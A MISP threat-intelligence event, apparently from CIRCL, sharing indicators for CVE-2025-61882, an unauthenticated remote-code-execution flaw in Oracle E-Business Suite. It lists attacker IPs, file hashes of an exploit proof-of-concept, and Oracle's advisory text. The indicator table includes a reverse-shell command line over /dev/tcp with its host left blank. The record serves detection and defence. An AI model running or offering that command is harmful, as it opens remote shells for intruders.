{
  "Event": {
    "analysis": "2",
    "date": "2025-10-06",
    "extends_uuid": "",
    "info": "OSINT - Oracle Security Alert Advisory - CVE-2025-61882",
    "publish_timestamp": "1759751681",
    "published": true,
    "threat_level_id": "4",
    "timestamp": "1759745387",
    "uuid": "1d1eb8f6-bb88-40c3-9f1a-5e13f08646a5",
    "Orgc": {
      "name": "CIRCL",
      "uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
    },
    "Tag": [
      {
        "colour": "#004646",
        "local": false,
        "name": "type:OSINT",
        "relationship_type": ""
      },
      {
        "colour": "#0071c3",
        "local": false,
        "name": "osint:lifetime=\"perpetual\"",
        "relationship_type": ""
      },
      {
        "colour": "#0087e8",
        "local": false,
        "name": "osint:certainty=\"50\"",
        "relationship_type": ""
      },
      {
        "colour": "#ffffff",
        "local": false,
        "name": "tlp:white",
        "relationship_type": ""
      },
      {
        "colour": "#ffffff",
        "local": false,
        "name": "tlp:clear",
        "relationship_type": ""
      },
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:mitre-attack-pattern=\"Exploit Public-Facing Application - T1190\"",
        "relationship_type": ""
      }
    ],
    "Attribute": [
      {
        "category": "External analysis",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1759744780",
        "to_ids": false,
        "type": "vulnerability",
        "uuid": "7e733571-418e-42f0-ba87-4ae26dee30f2",
        "value": "CVE-2025-61882"
      },
      {
        "category": "Network activity",
        "comment": "Potential GET and POST activity",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1759744882",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "f937cedd-b595-42d1-812c-1bf2fcc978fc",
        "value": "200.107.207.26"
      },
      {
        "category": "Network activity",
        "comment": "Potential GET and POST activity",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1759744911",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "e91261ed-2f1c-4a9a-9968-a950935e7f72",
        "value": "185.181.60.11"
      },
      {
        "category": "Payload delivery",
        "comment": "oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1759744957",
        "to_ids": true,
        "type": "sha256",
        "uuid": "02089e6d-2f05-4b72-bd58-d106c566ac33",
        "value": "76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d"
      },
      {
        "category": "Payload delivery",
        "comment": "oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1759744994",
        "to_ids": true,
        "type": "sha256",
        "uuid": "5cead1eb-d336-4078-9120-7a3feceeaa78",
        "value": "aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121"
      },
      {
        "category": "Payload delivery",
        "comment": "oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1759745161",
        "to_ids": true,
        "type": "sha256",
        "uuid": "85058bc5-7bbb-4534-97ca-ba5c4a22eef9",
        "value": "6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b"
      }
    ],
    "Object": [
      {
        "comment": "CVE-2025-61882: Enriched via the vulnerability_lookup module",
        "deleted": false,
        "description": "Vulnerability object describing a common vulnerability enumeration which can describe published, unpublished, under review or embargo vulnerability for software, equipments or hardware.",
        "meta-category": "vulnerability",
        "name": "vulnerability",
        "template_uuid": "81650945-f186-437b-8945-9f31715d32da",
        "template_version": "9",
        "timestamp": "1759744789",
        "uuid": "f0651a4d-d87b-495f-88f5-740be6e54c94",
        "ObjectReference": [
          {
            "comment": "",
            "object_uuid": "f0651a4d-d87b-495f-88f5-740be6e54c94",
            "referenced_uuid": "7e733571-418e-42f0-ba87-4ae26dee30f2",
            "relationship_type": "related-to",
            "timestamp": "1759744789",
            "uuid": "25c496e6-dfb1-4381-843e-bfe386958655"
          }
        ],
        "Attribute": [
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1759744789",
            "to_ids": false,
            "type": "link",
            "uuid": "60e55775-07d6-4d22-8221-b76d3c65add1",
            "value": "https://vulnerability.circl.lu/vuln/CVE-2025-61882"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "id",
            "timestamp": "1759744789",
            "to_ids": false,
            "type": "vulnerability",
            "uuid": "b44f98a2-d3df-4eb7-9dc6-7c967f439255",
            "value": "CVE-2025-61882"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "published",
            "timestamp": "1759744789",
            "to_ids": false,
            "type": "datetime",
            "uuid": "db8f2ccb-c41a-4359-9ccb-beb511cd027c",
            "value": "2025-10-05T03:17:01.644000+00:00"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "modified",
            "timestamp": "1759744789",
            "to_ids": false,
            "type": "datetime",
            "uuid": "141bdd65-c73f-4b8f-a685-69cfad202557",
            "value": "2025-10-05T03:17:01.644000+00:00"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "state",
            "timestamp": "1759744789",
            "to_ids": false,
            "type": "text",
            "uuid": "b9e6f6e7-c7fc-4917-bfa2-d35015e75b0e",
            "value": "PUBLISHED"
          },
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1759744789",
            "to_ids": false,
            "type": "link",
            "uuid": "75927252-4419-4663-8650-d0412844ba77",
            "value": "https://www.oracle.com/security-alerts/alert-cve-2025-61882.html"
          }
        ]
      },
      {
        "comment": "76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d: Enriched via the virustotal_public module",
        "deleted": false,
        "description": "VirusTotal report",
        "meta-category": "misc",
        "name": "virustotal-report",
        "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
        "template_version": "5",
        "timestamp": "1759744971",
        "uuid": "a035ede3-e338-428c-a538-a1e1e828e49e",
        "Attribute": [
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "permalink",
            "timestamp": "1759744971",
            "to_ids": false,
            "type": "link",
            "uuid": "c6d5170b-c4fc-4277-9230-d41f27ab462a",
            "value": "https://www.virustotal.com/gui/file/76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "detection-ratio",
            "timestamp": "1759744971",
            "to_ids": false,
            "type": "text",
            "uuid": "d6c440b2-3c8b-4598-8e1f-c1cf08db3ffe",
            "value": "0/65"
          }
        ]
      },
      {
        "comment": "76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d: Enriched via the virustotal_public module",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "25",
        "timestamp": "1759744971",
        "uuid": "bd72999e-68d0-42ac-a6e5-becfcc31d98a",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "md5",
            "timestamp": "1759744971",
            "to_ids": true,
            "type": "md5",
            "uuid": "6ba2d676-f340-4830-bce7-1481e1a81595",
            "value": "d3bbb54a9e93f355f7830e298a99161d"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha1",
            "timestamp": "1759744971",
            "to_ids": true,
            "type": "sha1",
            "uuid": "fc888202-50d7-43d8-8e98-ead5151931c8",
            "value": "99c208a55513bde70d4322fdcab86c8cb4188616"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1759744971",
            "to_ids": true,
            "type": "sha256",
            "uuid": "d02696b0-c147-42de-ac3f-30e3427c330c",
            "value": "76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "tlsh",
            "timestamp": "1759744971",
            "to_ids": true,
            "type": "tlsh",
            "uuid": "29baa926-fcf2-4cc5-b9a6-20cf20d7fce8",
            "value": "t1b0911a7f6a288ca7d16f127db2a74c4085ffd68fc0069d3baf9161f6844a6903d28d43"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "vhash",
            "timestamp": "1759744971",
            "to_ids": true,
            "type": "vhash",
            "uuid": "5055aaa2-59c4-4556-b7b4-cd9767bee805",
            "value": "eba26b78ded0de06238850964fb47e2a"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "ssdeep",
            "timestamp": "1759744971",
            "to_ids": true,
            "type": "ssdeep",
            "uuid": "2d808828-33dc-4169-af4e-b975e975b3c2",
            "value": "96:hzf8N2agHcJFk6dPuqMeheD2IjSqwV9e5AXbVaO:hdagHiFXWScyIjH6RbVaO"
          }
        ]
      },
      {
        "comment": "aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121: Enriched via the virustotal_public module",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "25",
        "timestamp": "1759745123",
        "uuid": "1d92812f-2c6f-451b-ba1b-35eb14036c81",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "md5",
            "timestamp": "1759745123",
            "to_ids": true,
            "type": "md5",
            "uuid": "3f657d06-791c-4c44-bd8c-7e79307ed949",
            "value": "b296d3b3115762096286f225696a9bb1"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha1",
            "timestamp": "1759745123",
            "to_ids": true,
            "type": "sha1",
            "uuid": "76ff1bb6-8550-41b5-a43e-558d85e4768a",
            "value": "f90ac7ef934cb7d4d5e7f21338961727ca72fa6d"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1759745123",
            "to_ids": true,
            "type": "sha256",
            "uuid": "68a5f07b-3b1b-4255-baa4-d50ac53546a4",
            "value": "aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "tlsh",
            "timestamp": "1759745123",
            "to_ids": true,
            "type": "tlsh",
            "uuid": "f46ae852-1033-46e4-a074-6df87b0b282e",
            "value": "t18f7174665c03d8874ab2594ddcb3ee11e31222a338636006fa5c2251efb594de366dfe"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "ssdeep",
            "timestamp": "1759745123",
            "to_ids": true,
            "type": "ssdeep",
            "uuid": "f77efa49-c777-496b-98a7-a359bd1cb6c4",
            "value": "96:kuRM2ZNq0RGy/iokytiIMF0IInJpUtf1GStPh8Q2Xn:kp2N/istikIuJsfQkOZX"
          }
        ]
      },
      {
        "comment": "6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b: Enriched via the virustotal_public module",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "25",
        "timestamp": "1759745248",
        "uuid": "64717405-887a-4d68-8d1c-adc5f709501b",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "md5",
            "timestamp": "1759745248",
            "to_ids": true,
            "type": "md5",
            "uuid": "f70beeff-d685-4a5c-8f34-3c5bceda5d48",
            "value": "23094d64721a279c0ce637584b87d6f1"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha1",
            "timestamp": "1759745248",
            "to_ids": true,
            "type": "sha1",
            "uuid": "6a727d52-b04e-4dc5-95f4-79aefb81aac7",
            "value": "4871816be6a1128d2cf2f516788a6b8bc39b0d60"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1759745248",
            "to_ids": true,
            "type": "sha256",
            "uuid": "494cbdbd-4383-42d7-9c50-77ea75311e50",
            "value": "6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "tlsh",
            "timestamp": "1759745248",
            "to_ids": true,
            "type": "tlsh",
            "uuid": "9076aea3-49d6-4158-95d9-bc82aa205c0d",
            "value": "t15d5153de4c079c814778e50ee5facf10eb51955b0c20a0c4bf8d7b1eaf70f05556aaaa"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "ssdeep",
            "timestamp": "1759745248",
            "to_ids": true,
            "type": "ssdeep",
            "uuid": "2c98aced-3f18-4086-91e4-7357bd163ac1",
            "value": "48:6Ti9ShDWaxmfm6NTRL9DvVfSScxVy3HAbckc:6i8DWgm+0TTZJcLyXgckc"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "Report object to describe a report along with its metadata.",
        "meta-category": "misc",
        "name": "report",
        "template_uuid": "70a68471-df22-4e3f-aa1a-5a3be19f82df",
        "template_version": "8",
        "timestamp": "1759745387",
        "uuid": "7119b976-d0a2-4022-945b-db19597cb15d",
        "Attribute": [
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "link",
            "timestamp": "1759745387",
            "to_ids": false,
            "type": "link",
            "uuid": "b59190d2-cb3f-4d5c-ad72-5e61012994aa",
            "value": "https://www.oracle.com/security-alerts/alert-cve-2025-61882.html"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "summary",
            "timestamp": "1759745387",
            "to_ids": false,
            "type": "text",
            "uuid": "a3983505-8204-40eb-9f59-20d478d0c999",
            "value": "This Security Alert addresses vulnerability CVE-2025-61882 in Oracle E-Business Suite. This vulnerability is remotely exploitable without authentication, i.e., it may be exploited over a network without the need for a username and password. If successfully exploited, this vulnerability may result in remote code execution.\r\n\r\nOracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible. Oracle always recommends that customers remain on actively-supported versions and apply all Security Alerts and Critical Patch Update security patches without delay. Note that the October 2023 Critical Patch Update is a prerequisite for application of the updates in this Security Alert.\r\n\r\nIndicators of compromise (IP addresses, observed commands, and files) to support immediate detection, hunting, and containment are detailed below the risk matrix."
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "title",
            "timestamp": "1759745387",
            "to_ids": false,
            "type": "text",
            "uuid": "dfbc5bfe-2ae5-4404-a9de-4abd4d0c31d3",
            "value": "Oracle Security Alert Advisory - CVE-2025-61882"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "type",
            "timestamp": "1759745387",
            "to_ids": false,
            "type": "text",
            "uuid": "1d2eeb43-abdc-4bb7-91b5-dfb4789983dd",
            "value": "Blog"
          }
        ]
      }
    ],
    "EventReport": [
      {
        "name": "Report from - https://www.oracle.com/security-alerts/alert-cve-2025-61882.html (1759744750)",
        "content": "* Skip to content\n* Accessibility Policy\n\nProducts\nIndustries\nResources\nCustomers\nPartners\nDevelopers\nCompany\n\nClose Search\n\n\n\n\nSearch Oracle.com\n\n* QUICK LINKS\n* Oracle Cloud Infrastructure\n* Oracle Fusion Cloud Applications\n* Oracle Database\n* Download Java\n* Careers at Oracle\n\nSearch\n\nCountry\n\nView Accounts\n\nBack\n\nCloud Account\nSign in to Cloud\nSign Up for Free Cloud Tier\n\nOracle Account\n\n* Sign-In\n* Create an Account\n\n* Help\n* Sign Out\n\nContact Sales\n\nMenu\n\nMenu\n\n\n\n\n\n## Oracle Security Alert Advisory - CVE-2025-61882\n\n### Description\n\nThis Security Alert addresses vulnerability CVE-2025-61882 in Oracle E-Business Suite. This vulnerability is remotely exploitable without authentication, i.e., it may be exploited over a network without the need for a username and password. If successfully exploited, this vulnerability may result in remote code execution.  \n  \nOracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible. Oracle always recommends that customers remain on actively-supported versions and apply all Security Alerts and Critical Patch Update security patches without delay. Note that the October 2023 Critical Patch Update is a prerequisite for application of the updates in this Security Alert.  \n  \nIndicators of compromise (IP addresses, observed commands, and files) to support immediate detection, hunting, and containment are detailed below the risk matrix.\n\n### Affected Products and Patch Information\n\nSecurity vulnerabilities addressed by this Security Alert affect the products listed below.\n\n**Please click on the links in the Patch Availability Document column below to access the documentation for patch availability information and installation instructions.**\n\n| Affected Products and Versions | Patch Availability Document |\n| --- | --- |\n| Oracle E-Business Suite, versions 12.2.3-12.2.14 | Oracle E-Business Suite |\n\n### Security Alert Supported Products and Versions\n\nPatches released through the Security Alert program are provided only for product versions that are covered under the Premier Support or Extended Support phases of the  Lifetime Support Policy. Oracle recommends that customers plan product upgrades to ensure that patches released through the Security Alert program are available for the versions they are currently running.\n\nProduct releases that are not under Premier Support or Extended Support are not tested for the presence of vulnerabilities addressed by this Security Alert. However, it is likely that earlier versions of affected releases are also affected by these vulnerabilities. As a result, Oracle recommends that customers upgrade to supported versions.\n\n### References\n\n* Oracle Critical Patch Updates, Security Alerts and Bulletins\n* Oracle Critical Patch Updates and Security Alerts - Frequently Asked Questions\n* Risk Matrix Definitions\n* Use of Common Vulnerability Scoring System (CVSS) by Oracle\n* English text version of the risk matrices\n* CSAF JSON version of the risk matrices\n* Map of CVE to Advisory/Alert\n* Oracle Lifetime support Policy\n* JEP 290 Reference Blocklist Filter\n\n### Risk Matrix Content\n\nRisk matrices list only security vulnerabilities that are newly addressed by the patches associated with this advisory. Risk matrices for previous security patches can be found in previous Critical Patch Update advisories and Alerts. An English text version of the risk matrices provided in this document is  here.\n\nSecurity vulnerabilities are scored using CVSS version 3.1 (see Oracle CVSS Scoring for an explanation of how Oracle applies CVSS version 3.1).\n\nOracle conducts an analysis of each security vulnerability addressed by a Security Alert. Oracle does not disclose detailed information about this security analysis to customers, but the resulting Risk Matrix and associated documentation provide information about conditions required to exploit the vulnerability and the potential impact of a successful exploit. Oracle provides this information so that customers may conduct their own risk analysis based on the particulars of their product usage. For more information, see Oracle vulnerability disclosure policies.\n\nThe protocol in the risk matrix implies that all of its secure variants are affected as well. For example, if HTTP is listed as an affected protocol, it implies that HTTPS is also affected. The secure variant of a protocol is listed in the risk matrix only if it is the *only* variant affected.\n\n### Credit Statement\n\nThe following people or organizations reported security vulnerabilities addressed by this Security Alert to Oracle: None credited in this Security Alert.\n\n### Modification History\n\n| Date | Note |\n| --- | --- |\n| 2025-October-04 | Rev 1. Initial Release. |\n\n#### Oracle E-Business Suite Risk Matrix\n\nThis Security Alert contains 1 new security patch for Oracle E-Business Suite.\u00a0 This vulnerability is remotely exploitable without authentication, i.e., may be exploited over a network without requiring user credentials.\u00a0 The English text form of this Risk Matrix can be found here.\n\n| CVE ID | Product | Component | Protocol | Remote  Exploit  without  Auth.? | CVSS VERSION 3.1 RISK (see Risk Matrix Definitions) | | | | | | | | | Supported Versions Affected | Notes |\n| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |\n| Base  Score | Attack  Vector | Attack  Complex | Privs  Req'd | User  Interact | Scope | Confid-  entiality | Inte-  grity | Avail-  ability |\n| CVE-2025-61882 | Oracle Concurrent Processing | BI Publisher Integration | HTTP | Yes | 9.8 | Network | Low | None | None | Un-  changed | High | High | High | 12.2.3-12.2.14 |  |\n\n**Indicators of Compromise (IOCs)**  \n  \nBelow are the indicators of compromise (IP addresses, observed commands, and files) to support immediate detection, hunting, and containment.  \n\n| Indicator | Type | Description |\n| --- | --- | --- |\n| 200[.]107[.]207[.]26 | IP | Potential GET and POST activity |\n| 185[.]181[.]60[.]11 | IP | Potential GET and POST activity |\n| sh -c /bin/bash -i >& /dev/tcp// 0>&1 | Command | Establish an outbound TCP connection over a specific port |\n| 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA 256 | oracle\\_ebs\\_nday\\_exploit\\_poc\\_scattered\\_lapsus\\_retard\\_cl0p\\_hunters.zip |\n| aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA 256 | oracle\\_ebs\\_nday\\_exploit\\_poc\\_scattered\\_lapsus\\_retard-cl0p\\_hunters/exp.py |\n| 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA 256 | oracle\\_ebs\\_nday\\_exploit\\_poc\\_scattered\\_lapsus\\_retard-cl0p\\_hunters/server.py |\n\n##",
        "id": "1881",
        "event_id": "351966",
        "timestamp": "1759744750",
        "uuid": "8089541a-1146-4a26-b8ae-f00950a2e87f",
        "deleted": false
      }
    ]
  }
}